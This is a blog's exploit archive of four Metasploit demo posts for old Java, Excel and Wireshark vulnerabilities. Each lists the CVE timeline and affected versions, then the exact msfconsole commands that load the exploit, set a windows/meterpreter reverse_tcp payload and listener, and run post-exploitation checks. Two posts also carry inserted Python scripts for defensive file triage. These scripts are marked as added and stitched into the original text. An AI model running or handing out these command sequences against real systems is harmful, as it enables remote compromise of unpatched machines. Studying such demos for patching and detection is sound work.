Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2011-3544 Java Applet Rhino Script Engine Metasploit Demo

Timeline :

Vulnerability discovered and reported to ZDI by Michael Schierl
Vulnerability reported to vendor by ZDI on 2011-05-12
Coordinated release of the vulnerability on 2011-10-26
First exploit provided by Michael Schierl
Metasploit PoC provided on 2011-11-29

PoC provided by :

Michael Schierl
juan vazquez
Edward D. Teach
sinn3r

Reference(s) :

CVE-2011-3544
OSVDB-76500
ZDI-11-305
Oracle Java SE CPU October 2011

Affected version(s) :

JDK and JRE 7; JDK and JRE 6 Update 27 and earlier

Tested on Windows XP Pro SP3 with :

Java JSE 6 Update 26

Description :

This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 Update 27 and earlier, and should work on any browser that supports Java (for example IE, Firefox, Google Chrome, etc.).

Commands :

use exploit/multi/browser/java_rhino
set SRVHOST 192.168.178.21
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

MS10-038 Office Excel 2002 Overflow Exploit Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Nicolas Joly
Coordinated release of the vulnerability on 2010-06-08
First exploit provided by abysssec on 2010-09-24
Metasploit PoC provided on 2011-11-21

PoC provided by :

Nicolas Joly
Shahin Ramezany
juan vazquez

Reference(s) :

CVE-2010-0822
OSVDB-65236
MS10-038
MOAUB #24
EDB-ID-15094

Affected version(s) :

Microsoft Office Excel 2002 Service Pack 3 and below
Microsoft Office Excel 2003 Service Pack 3 and below
Microsoft Office Excel 2007 Service Pack 1 and below
Microsoft Office Excel 2007 Service Pack 2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Open XML File Format Converter for Mac
Microsoft Office Excel Viewer Service Pack 1 and below
Microsoft Office Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 1
Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2

Tested on Windows XP Pro SP3 with :

Microsoft Excel 2002 (10.2614.2625) SP0

Description :

This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record, an attacker can take control of the execution flow. This results in arbitrary code execution in the context of the user.
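For triage on the defender's side, the following added example (not part of the original post or of the Metasploit module) walks a raw BIFF record stream, the format inside the workbook stream of a .xls file, and lists every OBJ (0x5D) record with its offset and declared length, flagging one whose declared length runs past the end of the data. The BIFF stream is constructed inline; a real file would first need its workbook stream extracted from the OLE2 container, which is assumed to have been done already.

```python
import struct

# BIFF record ids: the OBJ type named in the MS10-038 description plus the framing records
BIFF_BOF = 0x0809
BIFF_EOF = 0x000A
BIFF_OBJ = 0x005D


def walk_biff(stream: bytes):
    """Yield (offset, record_type, declared_len, data) for each BIFF record.
    A record is a 2-byte little-endian type, a 2-byte length, then the data.
    A declared length that overruns the stream is yielded with data=None so a
    triage tool can flag it instead of silently truncating."""
    off = 0
    while off + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, off)
        body = stream[off + 4: off + 4 + rlen]
        if len(body) < rlen:
            yield off, rtype, rlen, None
            return
        yield off, rtype, rlen, body
        off += 4 + rlen
        if rtype == BIFF_EOF:
            return


def triage_obj_records(stream: bytes):
    """Return one dict per OBJ record: offset, declared length, truncated flag."""
    findings = []
    for off, rtype, rlen, body in walk_biff(stream):
        if rtype == BIFF_OBJ:
            findings.append({"offset": off, "length": rlen, "truncated": body is None})
    return findings


def build_sample_stream(obj_len: int, truncate: bool = False) -> bytes:
    """Constructed sample (not a real workbook): BOF, one OBJ record of obj_len
    bytes, EOF. With truncate=True the OBJ header still claims obj_len but the
    stream is cut off mid-record, as a damaged or hand-built file might be."""
    bof = struct.pack("<HH", BIFF_BOF, 16) + b"\x00" * 16
    obj = struct.pack("<HH", BIFF_OBJ, obj_len) + b"\x00" * obj_len
    eof = struct.pack("<HH", BIFF_EOF, 0)
    if truncate:
        return bof + obj[: 4 + obj_len // 2]
    return bof + obj + eof


if __name__ == "__main__":
    for finding in triage_obj_records(build_sample_stream(20, truncate=True)):
        print(finding)
```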

Commands :

use exploit/windows/fileformat/ms10_038_excel_obj_bof
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo

CVE-2011-3360 Wireshark console.lua pre-loading Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Haifei Li of MMPC on 2011-07-18
Coordinated release of the vulnerability on 2011-11-15
Metasploit PoC provided on 2011-11-18

PoC provided by :

Haifei Li
sinn3r

Reference(s) :

CVE-2011-3360
OSVDB-75347
MSVR11-014

Affected version(s) :

Wireshark 1.6.1 and earlier

Tested on Windows XP Pro SP3 with :

Wireshark 1.6.1

Description :

This module exploits a vulnerability in Wireshark 1.6 or earlier. When opening a pcap file, Wireshark checks whether a ‘console.lua’ file exists in the same directory and, if found, parses and executes the script. Versions affected by this vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8.
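Because the pre-loading happens from the capture file's own directory, a simple hygiene check for analysts is to look for a console.lua sitting next to capture files in shared trace folders. The added example below (not part of the original post or of the Metasploit module) does that over a directory tree; the tree it scans is a constructed sample built in a temporary directory.

```python
import os
import tempfile

CAPTURE_EXTS = (".pcap", ".pcapng", ".cap")
LUA_NAME = "console.lua"


def find_console_lua_beside_captures(root: str):
    """Walk root and return (directory, console.lua path, capture files) for
    every directory holding both capture files and a console.lua, the layout
    a vulnerable Wireshark 1.4.0-1.4.8 / 1.6.0-1.6.1 would pre-load from."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        lowered = {f.lower(): f for f in files}
        if LUA_NAME not in lowered:
            continue
        captures = sorted(f for f in files if f.lower().endswith(CAPTURE_EXTS))
        if captures:
            hits.append((dirpath, os.path.join(dirpath, lowered[LUA_NAME]), captures))
    return hits


def build_sample_tree() -> str:
    """Constructed sample tree (placeholder files, not real data): one directory
    with a capture and a console.lua, one with a capture only, one with only a
    console.lua. Only the first should be reported."""
    root = tempfile.mkdtemp(prefix="wireshark_lua_check_")
    layout = {
        os.path.join("share", "traces"): ["capture1.pcap", "Console.lua"],
        os.path.join("share", "clean"): ["capture2.pcapng"],
        os.path.join("share", "scripts"): ["console.lua"],
    }
    for sub, names in layout.items():
        d = os.path.join(root, sub)
        os.makedirs(d)
        for n in names:
            with open(os.path.join(d, n), "w") as fh:
                fh.write("-- constructed placeholder\n")
    return root


if __name__ == "__main__":
    for d, lua, caps in find_console_lua_beside_captures(build_sample_tree()):
        print(f"{d}: {lua} sits next to {', '.join(caps)}")
```

The name match is case-insensitive because the demo targets Windows, where the filesystem is.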

Commands :

use exploit/windows/misc/wireshark_lua
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to ZDI by Aniway
Vulnerability reported to vendor by ZDI on 2010-10-18
Coordinated release of the vulnerability on 2011-04-12
Metasploit PoC provided on 2011-11-05

PoC provided by :

Aniway
abysssec
sinn3r
juan vazquez

Reference(s) :

CVE-2011-0105
MS11-021
ZDI-11-121

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2007 Service Pack 2
Microsoft Office 2010 (32 and 64 bits edition)
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office for Mac 2011
Open XML File Format Converter for Mac
Microsoft Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2

Tested on Windows XP Pro SP3 with :

Microsoft Office Excel 2007 (12.0.4518.014)

Description :

This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine and the number of bytes to copy, causing a stack-based buffer overflow. This results in arbitrary code execution in the context of the user.

Commands :

use exploit/windows/fileformat/ms11_021_xlb_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21

getuid
sysinfo